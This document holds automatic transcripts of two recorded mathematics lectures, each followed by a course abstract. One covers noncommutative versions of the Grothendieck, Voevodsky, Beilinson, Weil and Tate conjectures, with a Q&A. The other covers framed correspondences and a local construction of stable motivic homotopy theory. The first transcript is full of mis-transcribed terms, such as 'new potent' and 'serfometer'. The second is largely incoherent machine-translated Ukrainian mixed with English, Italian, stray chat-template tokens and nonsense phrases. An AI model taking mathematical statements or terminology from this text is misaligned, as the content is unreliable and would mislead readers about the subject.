So you say that the cycle is no potently trivial if by definition there exists an integer such that when you tensor the cycle with itself n times, then this is something that lives on the k0, a tensor with itself n times, that this is actually become zero. So you can make this definition. How about homological equivalence? Well, we now have this, our non-committative homology theories that I've explained. So you define homological equivalence as follows. So you simply say that here you have, so this comes equipped also with charm characters. So this is something that I will explain better on Wednesday. So here you have charm characters defined on the k0 to the positive part of the periodic cyclical homology and the positive part of the topological periodic cyclical homology. And you simply say that, well, it's homologically trivial if the charm character of it becomes zero. And you also have the numerical equivalence. So here, how do you define intersection of cycles? Well, what you can do is you look at the k0 and you define a pairing on k0 as follows. So if you have a module and another one and look at the corresponding classes, one thing that you can do is to look the homes on the drive category of your A, look at the homes from m to the shifts of m, and look at these dimensions, and then take an alternating sum of these dimensions for m varying on the integers. And so in this way, we extract this number and this pairing, they extract the pairing on the k0, which is neither symmetric, neither is Q symmetric. But since A is smooth and proper, it turns out that you'll have a serfometer and using this serfometer, you can prove that the left and right kernel, which are priori are different, are in fact the same. So you can actually define something numerically trivial if this pairing, let's call c of alpha beta, it's equal to zero for every beta. Okay, and then we have the similar remarks. So if you have a cycle which is a new potent with trivial, will be homologically trivial, will be numerically trivial. So that implies that on the k0, you have all these discussions, module of the new potent, module of the homological module of the numerical. And again, this is always finite dimension. Does it mean this new potency goes to zero? That means the order characteristic is zero? No, it means that beam zero here means that this pairing vanishes for every b and alpha, such that this pairing vanishes for every b. The new potency implies this the equivalency mentioned. Yes. The homological. Yes, implies the homological, yes. It's an exercise, yeah. If you have something new potentally trivial, it will be homologically trivial. Okay, and now we using this we can, we can as you expect, you can do formulate this this non commutative counterparts. So we have this non commutative grottenby extender conjecture. So what you say here, it's here, it's a conjecture, let's see, D, so this is of type D, so D and C of A. So this simply says that the k0, when you mod out biological or by numerical, they are the same. Also, you can define this non commutative version of Vojvodski, new potency equivalent, new potency conjecture. So let me write conjecture V and of C. So again, it's that the k0 up to new potent equivalence is the same as the k0 up to numerical equivalence. So once again, if these two, if these two are the same, then these two are the same. In other words, this conjecture implies the preceding one. And of course, we can also define the non commutative version of Balinson conjecture. So over a finite field, that in fact, the k0 is insensitive to all these equivalence relations. Okay, so these are the analogs. And then we can also go further and define the non commutative version of the V conjecture. So what do we do here? So again, we are over a finite field. And so if we have a smooth and proper Vg algebra, sorry, Vg category, you will look at this finite dimensional capital K vectors place, and it's equipped with this automorphism, the Frobenius zero. So it's just the cyclotomic Frobenius composed r times. And the same thing that Tp1 over P comes with this Frobenius. Here composed r times. And then the conjecture is that the conjecture is that if you take an eigenvalue, if this is an eigenvalue of the Frobenius zero respectively of the Frobenius one, then well that these numbers are Osprey numbers. And secondly, that complex absolute value is equal to one, respectively equal to square root of Q. And this for all conjugates of London. And also in this non commutative world, you have this analog of the proposition, which says that well, if there exists an integer such that when you multiply your lambda by Qn, and if you get an algebraic integer, then it turns out that the ellatic absolute value of lambda is actually equal to one for all conjugates of lambda and this for every prime different from P. So you also have this result. Of course, this conditional in this case in contrast with the commutative world. And also we have this. Consalor, how much time do you need still? I just have one and a half. It's pretty quick. Thank you. So let me just say that in the. Maybe there's a question. Is this, are these conjecture Kfury, Morita invariant? Yes, of course, yes. Yes, because anything that is Morita equivalent will actually have the same motive. Let me give you a very technological answer. They have the same non commutative motive and all these conjectures descend to non commutative motives. That's the approach that I will explain on Wednesday. Yes. And also we can talk about the non commutative asset value. That the functions. So here, of course, we cannot count points. The only thing that we can do is we need actually an embedding of capital K into C. And then if we choose this embedding, we can define this case. So the only thing that we have is the co homology. So what we can do is, is consider these functions, the determinant one minus QS and then the Frobenius at zero. But then we need to use this embedding to go towards C because here we are using complex conjugation in order that to make sense. Then you take the PA here and then you need to go to C. And then you can do the same story here. You can define it in this way. So determinant one minus Q minus S, the Frobenius one going to C on the PP1. Okay. So we have these functions, of course, over C. They are meromorphic. And what this is telling you is that, again, by by own definition, they are they are periodic with this period. And by by what our non-committative version of the Velconjecture is telling you is that the poles are actually here in this case and are actually at one half in this case. So the when we change the when we change the embedding, these functions change, but the place where the poles are actually do not change. And finally, let me just say that we also have the non-committative version of the PIN Conjecture. So I recall you that we are over a finite field. So we are over a finite field. And the conjecture is as follows. So we have this non-committative version for L different from P. So here what you do is you look at the k theory of A and you base change it to the field extensions. And then you do the both field localization with respect to topological k theory. And now you look at the pi minus one of this disabillion group. And then you do the the TL of this. So you do the the the ELADIC TATE module of this. And you ask it to be zero for every n greater or equal than one. So it's this vanishing conjecture saying that well all these TATE modules, ELADIC TATE modules of disabillion groups vanish for every possible n, for every possible extension. That's one way to phrase it. Then we have the P version of this. So here you have the churn character going towards TP zero of A. So when you inverted P and it plants on the invariance under the cyclotomic Frobenius. So when you change from Q to QP, this is subjective. And you also have a strong form of the TATE conjecture. So you say that the order at zero of this function A S. So you say that well there's actually zeros are here, but there is actually a pool here. And this pool is the order of this pool is given by the dimension of the k zero of A module on numerical equivalence. So we should like to emphasize that this thing here actually does not depend on the embedding. Because you can rethink about this if you see the definition. It's just the algebraic multiplicity of one of these operators. It does not depend on the embedding. That's what it's the order of the pool there. And then we also have this result saying that this strong form of the TATE conjecture implies the TATE conjecture itself. And moreover if you add this non-commutative version of Rotendex conjecture, this becomes equivalent. So what is the upshot of all this? The upshot of this is the the following theorem, which is the very last one and that will end there. It's just saying that all these definitions are the correct ones in the following sense. So it's the following. So if you take a smooth proper scheme, okay, and then you can do two things. You can look at the conjecture for x, where c is any one of these conjectures. So d, v, so Rotendex, Vojvodski, Bielensson, Veil, Tate, Tate, Tate, and many others, in fact. You can do this. Another thing that you can do is look at the non-commutative version of the conjecture for the associated djicothexam. And so if this conjecture holds, it turns out that this implies that the non-commutative version also holds. But what's interesting in the theorem is that this is actually inequivalent. So this is saying that these classical conjectures, all of them, that are formulated in this setting of algebraic geometry, in fact, they make sense in this much larger setting of djicothexam, smooth proper djicothexam. And if you plug, if you attack this particular kind of djicothexam, you recover the original conjecture. And this is true for these conjectures that I explained today, but there are many other conjectures for which this holds. I don't have time to explain. And now what is the idea is to explore that here now I have non-commutative techniques to try to attack the right-hand side and as a consequence, attack the left-hand side. And this is the goal of the following lectures. Okay, thank you and sorry for going over time. Okay, so thanks for the talk. So I'm sorry, so we are aware that there were serious problems with connection for certain of the attendees. So we are sorry, we will try to make it better, but unfortunately, it seems it's an internet problem. In any case, you'll have a YouTube video if you want to, if you could not follow the talk. So now we have questions. So I saved a few questions, three questions, three questions actually to, for the end of the talk. The first one is someone is asking, maybe if could you repeat what YTP is related to the Motivic stuff here? You mean Motivic stuff, you mean the commutative world, I imagine that's the question, right? Yes. So the relation is as follows. Yes, so the relation is as follows. So if you take the TP0 or 1 of your, so let me do like this. TP is too periodic and you take the TP of this TG category, you take your scheme and this one, it turns out that this gives you the positive part and the negative part, you'll get the sum of the even groups of the crystalline comology of your scheme and on the negative part, it gives you the sum of the odd comology groups on crystalline comology. So this telling you that, well, this invariant, of course, after inverting T, this tell you that, well, when you computed on this DG category, you get the crystalline comology, not the individual pieces, but up to parity. And moreover, now, you also here, so when you see that this TP comes equipped with the cyclotomic Frobenius, but this cyclotomic Frobenius, as I made this remark, is not Z2 graded, okay? It's not a Z2 graded thing. When you change to N to N minus 2, there is a scalar that appears. So let me say that I'm with P0 and P1, 0 and 1. And now I have the cyclotomic Frobenius 0 and 1 here, and they correspond to something here, and they here, they correspond to the sum of the even cyclotomic Frobenius on X, but with a certain scale multiplied by it. And here, the sum of the cyclotomic Frobenius, but multiplied by P minus T minus 1 over 2. So intuitively speaking, this is telling you that you lose the weights. When you pass from X to this category, you can recover everything up to weights. You lose the weights. But for the conjecture, that is enough. You don't lose anything in terms of the conjecture. So I want to testify here if the colors are completely unreadable. So don't use colors. Do you use colors? Yeah. Maybe the green. This is better. Slightly. Okay, just a remark. So there was another question about the relation. So I just say it again, about the relation between the NC conjecture and the usual one. And so that's on the blackboard. They are equivalent, the smooth proper case. Which one? No, the non-commutative and the usual one. So that's what you stated. And also there's a question. So do any of these conjectures have a mixed characteristic analog? Or formulation? I don't know. You want to be working over DVR or something like that? I guess so, yeah. Yeah, I mean, I haven't talked about that seriously. But I mentioned that, yeah, it's likely that you could expect something like that. Yes. Okay. So this is related, in fact. So there's another question about the relative versions of this conjecture. Are there relative versions of this conjecture? I don't know. I mean, yes, I mean, in the classical world, yes, I think there are some of them admit relative versions. Yes. I haven't explored that. Yes, that's a good question. That's a good thing for the future. So how do things work in families and things like that? Okay, so I'm not sure to understand the question correctly that knows, but I just read it. So what is a tensor m? And does it agree with the perf x to the m in the geometric case? Yes, yes, yes. When you do this, this is this. And my schemes are nice enough for which this kind of phenomena holds. Yes. So in the, I imagine that this question is about the new potency equivalence relation because on one side, it was on cycles on xn on cycles on xn and the other side was on the k0 of your a tensor m. And when a is of this form perf of x, it's yeah, there is this. Thanks. So that was that was a question of Remy van Doeben de Brun. There's also a question by Ola Sende. Is vanilla potency conjecture equivalent to the Baylinson-Soulet conjecture? And Baylinson is only over a finite field. Baylinson-Soulet. Ah, Baylinson-Soulet, maybe you can recall me what it is. Since vanishing of vanishing of motivic homogene in degrees in negative degree. Yeah, I don't remember. I have to dig in. Yeah, I think I remember that there are close connections between the two. I don't know if it's exactly the same, but yeah. Yeah, I don't remember from the top of my head. So I think there's no direct relation. Okay, if you put all conjectures. Oh, I think, I think the Baylinson-Soulet, it's actually the strong, it's actually the tight conjecture. And then you mod out by the numerical equivalence. Baylinson-Soulet? Yeah, it's not. No, it's just vanishing of motivic homogene in negative, in a simple degree. But okay, so I have to. Could you please state precisely how the LED state conjectures are formulated via TP? No, via TP, I'm formulating the TP version of this, right? So for this, I'm using the TP. It's actually, I'm using TP to formulate the P version of the T conjecture, right? And I formulated the L version of the T conjecture using KT, right? And the question is if you can do that. Yes, I mean, that can be done, but it's using these results of Thomasson that tells you that, I mean, the relation. The relation is that you have a Atya-Eirsbrug spectral sequence that goes from a latic cohomology to etalcateria. So you have something like this. So rationally, so they prove that it degenerates. So you have something like the etalcateria of X. When you complete at L and then you rationalize, that is in fact the sum of these latic cohomology groups. And so here you already have a link between the etalcateria with KT, but it's an etalcateria. But then you have this beautiful result of Thomasson that tells you that you can write this algebraically because you have completed at L. It's in fact to take the KT of U and to localize with respect to complex KT, and then if you complete at L, actually you get the same spec. And now here you have KT, so something that you can phrase for any eticateria, for any generality. And then if so you see that then the reformulation of the conjecture would be saying that if you go from the Schoen character from the K0 to here, it actually lands precisely on the things that are stable and the action of the absolute color. So I think it was already phrased like this in an old paper of Friedlander. So I have another question. So are there any strictly non-commutative applications of the conjectures or any of the conjecture? Yes, I mean this is somehow a motivation. Usually, let's say that if we divide the world in two, much more people would work on this side than on this side, I agree. And so people are motivated on trying to prove this. But on this side, these conjectures as we'll see on Wednesday, for example, will allow us to have a conditional description of the category of non-commutative numerical motives, something a bit analog to what Milne has done, described in terms of veil numbers up to a certain action of the absolute color group and things like that. So yeah, I mean we will attack, for example, this conjecture next time on Wednesday. For example, we'll prove that all these conjectures hold, if you put here an algebra, which is finite dimensional and a finite global dimension, not necessarily commutative. And all these non-commutative conjectures hold. So yeah, so we can, that's also, there are two paths. So there's Wednesday and Thursday. Wednesday, we go in this non-commutative direction and Thursday on this commutative direction. And in both cases, we are going to explore the link between these two. So there's another question about, so are there any new cases known where the conjecture holds in the non-commutative setting? What happens on Thursday, what I will explain is a way to prove this conjecture in some new cases where you don't use geometry. What you do is you prove this conjecture using some non-commutative techniques. And as a consequence, you get this conjecture for axes which were known, not known previously. If I understood correctly the question, is this more or less what he was asking? If I can, new cases, yes, on the very last talk, I will prove the classical conjectures in new cases. And the way to prove it is not using geometry, but using this viewpoint. It's not with the viewpoint. Last question, is there a paper attached to this mini course where we can read more details? Yes, absolutely. In fact, there is a survey on archive whose title is equal to the title of this course. So I think which is called the non-commutative counterparts of celebrated conjectures, if I remember. Okay, so there's no more question in the chat. It seems, are there questions in the room? No? No. Okay, so good. Thanks again. I'm going to say hello. Sorry for going over time. I got a bit confused with this time. Yeah, okay. I'm sorry for the voos who had problems with the connection. Okay, so we meet again in chapter 6.
|
Some celebrated conjectures of Beilinson, Grothendieck, Kimura, Tate, Voevodsky, Weil, and others, play a key central role in algebraic geometry. Notwithstanding the effort of several generations of mathematicians, the proof of (the majority of) these conjectures remains illusive. The aim of this course, prepared for a broad audience, is to give an overview of a recent noncommutative approach which has led to the proof of the aforementioned important conjectures in some new cases.
|
10.5446/50935 (DOI)
|
Дитакл of my second lecture, a local approach to SHFK. The purpose of this lecture is to give another approach to a stable motivic mathematical category. Присосядно ми діфігуємо трангулеті категорію трангулеті категорії SHFK. Ц gouka поліAJ rempl><br账 Mobl armp częові, тримав біля Dannersheech languages. Ми société пол CCTV, щоб successive � peacefully д handling д 있을 accessible, який пол Consider the category of the spectra. In the category m. The category of the material spaces means points in the initial. On smooth. And here, gm smash 1 is the mapping cone of the one section spec plus of the map spec plus 2. gm plus in the point of material spaces. So this map takes the point plus to the point plus and take non-distrignage point in the spec of the point 1 in gm. Присоціль, gm smash 1, is the push out of the exact diagram of this form. In which i is the point of the superficial set delta of 1. So the interval, the superficial interval is the base point 1. So one could draw a picture how does it look like, but let me skip this because this is not quite essential. The category of bispectra comes equipped with a stable projective local model structure defined as follows. 1. By a work, I apologize. It is well known that the category of point of material spaces comes equipped with the projective local monoidal model structure in which wikipurivalencies are just named local wikipurivalencies. So a map of material spaces is called wikipurivalencies in this structure provided that it is stockwise wikipurivalencies. Stabilizing the model structure in S1 direction, we get the category of spectra S1 of k of the S1 spectra, which is equipped with a stable projective local monoidal structure where wikipurivalencies are maps of spectra inducing isomersions on shifts of stable homotopy groups. Point different first induces stable wikipurivalencies on stops of the motivic S1 spectra. Now stabilizing the model structure on spectra S1 of k in the GM-1 direction, we arrive at the stable projective local model structure on the category of bispectra. Its triangulated category is triangulated homotopy category denoted by SH-nits of k. It is this category which triangulated homotopy category SH-nits of k is the many basis for all our further definitions. The nearest aim is to define this category SH-nits of k. As a full subcategory of SH-nits.anic ripple will be engaged in to these categories. Аппоінтів фрейм перешіфв ефв на смуфс К – це контраверен фантер з фрейм пласту К до категорії опонтів сетз. Фрейм місцевич шіф на смуфс К – це фрейм перешіф, також що ця рестрація на смуфс К – це місцевич шіф. Фрейм перешіф ефв у фабіліонів сетз. Це контраверен фантер з фрейм пласту К до категорії опонтів сетз. Це категорія опонтів сетз. Це скол радітів. Як ф вилювати на емфі схім це зірвовий груп. І ф у цьому сетз. І ф у цьому сетз. Це продукт ффх1, ффх2. Реалі, новий пункт з фреймом першіфу є фолиєм. Фрейм першіф ф фабіліонів це скол стабіл. І для кожного смузоваріатів х мовиєм з ффх2 ффх2 ффх2 х. Він збив з мовиєм сетз. Сетз. Я рекомендував, що такий мовиєм випадав у першого сетзу. Щоб вимагаємо між ффх і ффх вимагаємо з ффх2 і фрейм з фреймом першого сетз. Він збив. Фрейм першив з ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх2 ффх5 ффхоч вимагаємо стр oper вимагаємоhilselarma стрol Також для напр鬭ISютсяwar, також у В visiting Enité.irts Yup Apply та U A star x, from f of x to itself, is the identity map. Now the very key definition, namely the definition of the category sh frame nith of k. We define sh frame nith of k as a force of category in sh nith of k, consisting of those by spectra p, satisfying the following conditions. Firstly, first, each martyfik space Eij of E is a space with frame correspondences. That is a point in some initial that you find on the category of frame correspondences frame plus of k. The structure maps is the second condition in both directions, in the first direction and in the GPM, на одна direction sporty of the BF в ін vocation. Три elsewhere. Но ц organs Förár decree am Він може вирішувати, що с1 спектрум е star,j, і ця реклама є цим. Причині, рішіфт стабіломатопі групи файлового ста, а ці с1 спектрум, ці матеріки с1 спектрум, і ці стабіломатопіansas, а ці перенround FA andkap Od لя біля вирішитиifa заartsіfil �s – грош manual – геронезиorpімай, міг favorable —ає Untersけど Patron, singsA steel and studplet painting. втім джейсу С1 спектру і нахом з ГМ, нахом з ГМ-1 до J-1 в матерію С1 спектру в стаблній локалі пілюліць. в стаблній локалі пілюліць. Довжди з категорії фреймнісовки К каже фреймнісовки Байспектра. Ми маємо створювати, що дефінанса цієї категорії СХ фреймнісовки К є локалі, в тому що цей мопільон випадає в категорії СХ-нісовки К на офізаціюET який є ідентичним об'єктом. Ми<|it|><|transcribe|><|it|><|transcribe|><|it|><|transcribe|><|it|><|transcribe|><|it|><|transcribe|> è l'identità di obiettivo. Allora, prima di tutto, facciamo un sh di K usando il full embeddio e poi progettiamo un sh di K che è l'identità di un obiettivo e anche 보이 melhores маяю сделLet, як саме з соб transparency Bible. У зв�《Иbait for они до фека meinenoptōr차'a ynetta s종ie Auguston where she's described in the pay producing안олампер 4). But also another is quasi сommBLEEP Bon pcr з'ughterembar-bigframe constructed below. Так, в лекції тоді я вирішую... Я вирішую цю фонтеру і я вирішую цю фонтеру, як якась інвеса для фонтеру. Так, я вирішую, що це буде фонтеру. Так, перед тим, що я вирішую цю фонтеру, я вирішую цю фонтеру, як якась інвеса для фонтеру. Тому я вирішую цю фонтеру. Тому я вирішую цю фонтеру і я вирішую цю фонтеру, як якась інвеса для фонтеру. Так, я вирішую цю фонтеру, як якась інвеса для фонтеру. Так, я вирішую цю фонтеру, як якась інвеса для фонтеру. І ми також називаємо, якщо я вирішую цю фонтеру, якщо я вирішую цю фонтеру. Так, тут є найбільше, дуже гарній, дуже гарній мовиць, який scores на взагалі переб troubles over. В ecstasyнційка, для будівка,전 Bug desaf, і Legislature of Humanities<|ru|><|transcribe|> praying або індійний марківний ниснівчий шіст та стабіломатопіні групи, або індійний марківний ниснівчий шіст та азомарківний ниснівчий шіст в кожній рівні. Тому стабіломатівні ріволінці, від тих, яку будутьайтесь трапилис Bolsonaro Ventura на ш patiently цих500 к۔ game Є дуже важливі діфікції, щоб комп'ютувати A1 гомотопі шифсу з мотивику спектру чи мотивику байспектру. Також, цініші діфіктів з мотивику гомотопі випадують, що мотивику гомотопі шифсу з мотивику байспектру а комп'ютувати в тімці в одній ліністі з стаблі гомотопі групсу випадують з спектру або з Є. Наймільше, діфіктів з нів, з нів з 1 і також. Байспектру з мотивику байспектру з шфринцю і п'ю ві2 з ечесу. Зараз, аі1 гомотопі шифсу з х'юлі ні, і комп'ютити з к'юлі ні. Узвичай, іх, к'ю, то аі1 гомотопі шифсу з паємином паємином паємином. І в цій цісті з паємином паємином паємином нестаннівцьшим шіфом спектрум і з цією штуку, де стука, що є модірусом стуки. Я просто не знаю, що назву цих вертикальних бас. І якщо стука випадає більше з 0, то стабліються A1, хома до пи, з індексом, паємином паємином, з цією штуку, паємином паємином, паємином паємином, паємином паємином, паємином паємином, паємином паємином, з індексом Хimming jederiele вleverING�적 та highlights. Louisiana, Добаво е, п, е0, е1, е2, і також випадку в срк, і добаво е, е0, е1, еf, і також випадку в срк,whe, п, е0, е1, е2, обтravelв ir п, е0, е1, еf, і також випадку в срк, і добаво е1, е1, е1, е2, е1, entrance Я хотіuterна з analysis ofOf invest associated with data extermination, які fueledish in baselieritation, servers then atmosphere again. Part now for you. Пidi rate. Г எனоді. Це, я бы ange yolk snaping. Volume frequency Fisher tara plugged into this technology. there will announce when he was in bed, when he was taken out of bed... To be told these interviews are sono bidding Але не такатні thực BETHims для фантаарди, що cancel lotion, а вnerшити inexpensive technology CBSH фреймізовий transportation В цих клсячі 익 leftover яку має classical для ф atm Іпу Suddenly Так, які є нічого. Для спільної схеми X, вважай, що хіста премо пеки 4, 3, 4, премо дельто додаток козбаву пеку. І я рекомендував, що премо дельто ба козбаву пеку 4, в матифіктах я вирішив я вирішив в першу. Моя лекція кажуть, що це якось дуже важливе стабілі матифікт випаду. Так, це фринт шіфу діляння або вимовлення випаду в матифіктах випаду випаду випаду з фринту і взяти видоволі випаду випаду випаду з фринту Найшу, якщо випаду за фринту айс І тут є перша, або це, кікаємо, саполоса байспектрум Е, саполоса байспектрум Е, мотивик спеціалу АИД, які є фільтеріпка ліміців, або симплеційній смузі фільтеріпка ліміців. Ми тоді залишаємо фільтеріпку АИД у всьому інті, і це байспектрум, який ми називаємо фільтеріпку АИД. Давайте залишаємо, як залишати ці струкція, які були зверті в цій обіг, також, давайте залишаємо. Найбільше, залишаємо ці байспектрум і стабілізуємо це в гм-закону, в стандартному виграю. Стабілизація виграє до виграє до гм-закону, в стандартному виграю. Але, звісно, я не буду виграю, я не буду виграю, бо я не буду виграю в гм-закону, в стандартному виграю. Також, це може бути залишено, що байспектрум, кисто, фрейм-о-фей, і тіп-інфініті, кисто, фрейм-о-фей, були залишені кондішені 1, 2, 3, а дефініційні 2, 2. Також, бо більш, більш, тобі, вже маєте погодити про ці кондішені, дивіться, зберігай, і зберігай, ці кондішені. Кондішені є ці кондішені. Тож, я зберігаюся. Також, байспектрум зберігай кондішені 1, 2, 3, а дефініційні 2, 2. Також, бо більш, більш, ми не можемо сказати, що вони фрейм-о-фей. Але, наоборот, ці генеральні фрейм-о-фей вирішили в цих фрейм-о-фей. Для кожного зі мій схеми X ми можемо зберігати байспектрум, байсерспеншені спектрум у X-plus, і вирішати конструкцію T-staffer-A. І вийшов, що байспектрум вже буде фрейм-байспектрум, і це буде в СХ-фреймі. Ну, ж, генералі, що я маю зберігати, що, патікульно, щоб проїхати цю проєкт, ми потрібніть консилаціон, для A1 invariant, радитив, і сигмус табл. Прошу, чорі, чорі. Ми потрібніть консилаціон, для фрейм-молтів. Але я не говорив про... Можливо, я маю зберігати... Так, маю зберігати, що цей спектрум випадає на пейпо-4, як зберігати цей спектрум, також, більш генералі. Пліпати A1 спектрум, також, який випадає на пейпо-4, фільтератний каліміт, фільтератний каліміт, і зберігати ці спектрум, після гм-соспеншену спектруму Афей, і зберігати консилуціон, для цього спектрум, гм-соспеншену спектруму Афей. І результат є фрейм байспектрум. І трьох експекту, це генерал-1. Також, ви можете байспектрум A, якщо який випадає на пейпо-4, або каліміт, і зберігати спектрум, гитий гімт, або фрейм Афей, і зберігати байспектрум. Ніж економіка, байспектрум, є стаблі матерігів. Це буде висновлено. І який випадає на пейпо-4, байспектрум, це генерал-1 цього форму. Я маю сказати, що якщо ви бачите експектрум байспектрум, HFD, WWC-1, це буде цю цігра, і багато спектрум, якщо ви бачите, я не пам'ятаю цього нічого, може так, так, спектрум так, це так, або фрейм Ніст, і багато інтересних спектрум в цьому категорію. Бачите, байспектрум, який бачить, Саша Нешетов, який бачить. Наразі я готові діфідувати, діфідувати цю фонду МБАР-Бік з САХФК до САХФНІСОВК на імені чуць фанктури в цьому куфіпірунту у модолі виспектрум або х-и-с-і виспектрум консиструвати в експейсі екси-и-дж який бачить в експейсі діфідувати в експейсі трьома ванкасть ця ця бачить в експейсі фанктури виспектрум ми діфідувати МБАР-Бік фанктури в експейсі САХФНІСОВК фанктури в експейсі ця ця фанктури в експейсі і ми діфідувати виспектрум в експейсі стабл в виспектрум в експейсі наїхто виспектрум в експейсі для цього стабл митивіравствуйте в виспект הר komпорт competitors Асторіальні стабл митиві turmoil By the example 3, these two morphisms are stable motivic equivalences. це тому як це ст nihilusunkohae Sl exacerbيرIns came of. Синіфісі, tä Mumbaihericalr diary Luckmakers Нาย accident на ц Ranger ذатик міф интересови в такому проді serving ек Mil, Digital viewaremos, from0 coach those who know how to get up in moms Hole, let's consider something similar in general. хворобу Bon interest догowej до пер esempio Бенных кількою ласків А dieta, która в Männerі знайти щось від полейщини, і зильні. ухід. Ви випадаєте. Руло 2FC. Це МИТ. З МВ. МВ. Прим. ОК. Усь. МВ. Прим. ОК. ОК. Так. Ці маби укручують альфа. І вони є стабломатіві. Так. Та так. І так. Та так. Та так. Та так. Ц mudar Operations kleine allting.oples Körper. нег Egut friction system rehabilitation. Ні, не arrange nut 19 Bi law. Iêт. Ні. частичні п trabajo trud の receive лер? laughs Scr defeat profesional Play. Сп symptom to 3, з Census що whatF, що slopes Merry My Odinfeck, і що tanMuseum объєittenого обcastу є Coverings of Run flourish. The m of b frame is an Insch rather in this. зienen. Віднов Combat Earth чbla маєfront add. Committee Path, До ср Annie. Да. І arkadaşneath Sehr Station U. Аніс з Hmm.全部 вmerув innocence IPRIME. Кінцюй℄�ium 2A4, ще керівно то, що б misfet.'re Прогляньте, На моєсырі, на язич chef ultimately з Kash 4 could let's call ready its в цих срістах. Але, з іншого, якщо ми дозвичаємо СН і комп'ют, ми маємо комп'ют в цих срістах і в цих срістах то ми маємо робити пулян. Ми маємо робити пулян. Ми маємо робити пулян з іншого комп'ю, і ми маємо робити пулян з іншого комп'ю з іншого комп'ю. Але як ми знаємо, з цієї трошки мотивичні файмери з комп'ю з комп'ю в цих срістах. Тому ми можемо вонталювати цю комп'ю і вонталювати цю комп'ю з іншого комп'ю. Ви знаєте, ці форміли віддіонтично також. Тому ці форміли і ці формили віддіонтично також. Тому ці формили віддіонтично також. Ми прозуміли, що фонтер F вонталювати цю комп'ю. Тому вонталювати цю комп'ю з цією фонтеру вонталювати цю комп'ю з цією фонтеру вонталювати цю комп'ю з цією фонтеру вонталювати цю комп'ю. Тому ми можемо вонталювати цю комп'ю з цією, вонталювати цю комп'ю з цією з цією. Тому ми можемо вонам most з цією. investigations in the context of travel, i accounts on the answers plans made in Against war wave. The fact that the left the The fact that the left here is stable materialist table esterual Intellipsas While Esterual Intellipsas its organizу把它 і комун02uffs. Лosi gef upload. Також Norwegians хр HK sunshinearks mark В М if's view. The spectrum Of the form NBR big frame of E and also due to example three. We know Yeah. As I told above Е – айзе-морфікт, 2-м-битврейм. І фанта – m-битврейм. Е – клазай інверс, 2-м-битврейм. Y – кл affirmative. Let me describe one more nice property of the category SHFrame. Анимілясleepenethack.çaay ph Krajula –veda phant Therefore,known. fiquei навіть ес-χ пригідон sectors, і це談 lower rpch-ians cran field Twitter. Boydайselд Horse пересад indeed镜ний Він заходив рівно з – від Стан Sasha –aved тою toiто ж двиг Holmes Lab notified цук candle фонта, який роз punt то має echoesіbus, але тел thờiом wir в academic 세상 brake asleep та також має повівник whoavor somos готовий також після paw Smart teacher hands Buoy Rubik신 —KE, wurden х Simpson другом Cambridge, і беж peke та еre на Севернімème scripts. І всего пунктуру я не мат surgeon а susceptible reasonable right by Will для яких мотивик, для яких мотивик С-скетрум, С1-скетрум B, омігрі-інфініті луфс. Також, композиція цих два фанктури, омігрі-інфініті луфс та інфініті-соспенсіону фанктури, омігрі-інфініті луфс. І це дуже гарна дискліпція, вона треба випадати B з цих фріпів і випадати ВСІ і випадати фанктури С-стофрім. Також, в С-стофрім у ВСІ, це граєнг-нс-1 мотивик С-скетрум і цих каноникал-мофізм, що є вважно тут, буде стабіл локалний певілюлінць мотивик С-скетрум. Також, це означає, ці комп'ютаціону омігрі-інфініті гм-сигмі-інфініті гм у ній виріпіфті в ВСІ випадати ЛОКАЛІ в дуже легко. Також, у нас 5 минути. Також, я можу сказати, що наступне лекція має бути про те, що випадати в цих римах, що категорія С-скетрум в Кіністі в цій римах в цій римах в Кіністі в категорії С-скетрум. Також, у цих римах в Кіністі многие дanya в عليна unt 97... внутря не hybrid взагаліtext boring Bild purpose … д bardzo дуже막 interest rule. Big Frame on nhi Bana Ship Evol �alle views off hand erase. conteúність hinges a원 of something for the future. Доди найбільше. Я куплюiyimheen democracisch Center у сторонських gesprochenностях якіILYжі СУ morgen і г stems о bitake artificially constructed여ко demonstrateution ЗЛок heading for Elf frame motivic. This is a localization counter in the category SHness. Так paljon разом на общем. Т fences patrons в бwinning. Дам Ноєм Андрая Ласок!how many thanks in detail. Okay. Many thanks indeed! for the lecture. Any questions or comments? It seems that there are no questions and let's thank the lecturer again. amazing
|
V. Voevodsky [6] invented the category of framed correspondences with the hope to give a new construction of stable motivic homotopy theory SH(k) which will be more friendly for computational purposes. Joint with G. Garkusha we used framed correspondences to develop the theory of framed motives in [4]. This theory led us in [5] to a genuinely local construction of SH(k). In particular, we get rid of motivic equivalences completely. In my lectures I will recall the definition of framed correspondences and describe the genuinely local model for SH(k) (assuming that the base field k is infinite and perfect). I will also discuss several applications. Let Fr(Y,X) be the pointed set of stable framed correspondences between smooth algebraic varieties Y and X. For the first two applications I choose k = ℂ for simplicity. For further two applications k is any infinite and perfect field. (1) The simplicial space Fr(∆alg,S^1) has the homotopy type of the topological space Ω∞Σ∞(S^1_top). So the topological space Ω^∞S1Σ^∞_S1(S^1_top) is recovered as the simplicial set Fr(∆alg,S^1), which is described in terms of algebraic varieties only. This is one of the computational miracles of framed correspondences. (2) The assignment X ↦ π(Fr(∆alg,X⨂S^1)) is a homology theory on complex algebraic varieties. Moreover, this homology theory regarded with ℤ/n-coefficients coincides with the stable homotopies X ↦ π ^S_(X+^S^1_top;ℤ/n) with ℤ/n-coefficients. The latter result is an extension of the celebrated Suslin–Voevodsky theorem on motivic homology of weight zero to the stable motivic homotopy context. (3) Another application of the theory is as follows. It turns out that π^s_0,0(X+) = H0(ℤF(∆,X)), where (ℤF(∆,X)) is the chain complex of stable linear framed correspondences introduced in [4]. For X = G_m^^n this homology group was computed by A. Neshitov as the nth Milnor–Witt group K_n^MW (k) of the base field k recovering the celebrated theorem of Morel. (4) As a consequence of the theory of framed motives, the canonical morphism of motivic spaces can: C_Fr(X) → Ω^∞ℙ^1 Σ^∞_ℙ^1 (X+) is Nisnich locally a group completion for any smooth simplicial scheme X. In particular, if CFr(X) is Nisnevich locally connected, then the morphism can is a Nisnevich local weak equivalence. Thus in this case C_Fr(X) is an infinite motivic loop space and π_n(C_FR(X)(K)) = π^A1_n,0 (Σ^∞_ℙ^1 (X+))(K). In my lectures I will adhere to the following references: [1] A. Ananyevskiy, G. Garkusha, I. Panin, Cancellation theorem for framed motives of algebraic varieties, arXiv:1601.06642 [2] G. Garkusha, A. Neshitov, I. Panin, Framed motives of relative motivic spheres, arXiv:1604.02732v3. [3] G. 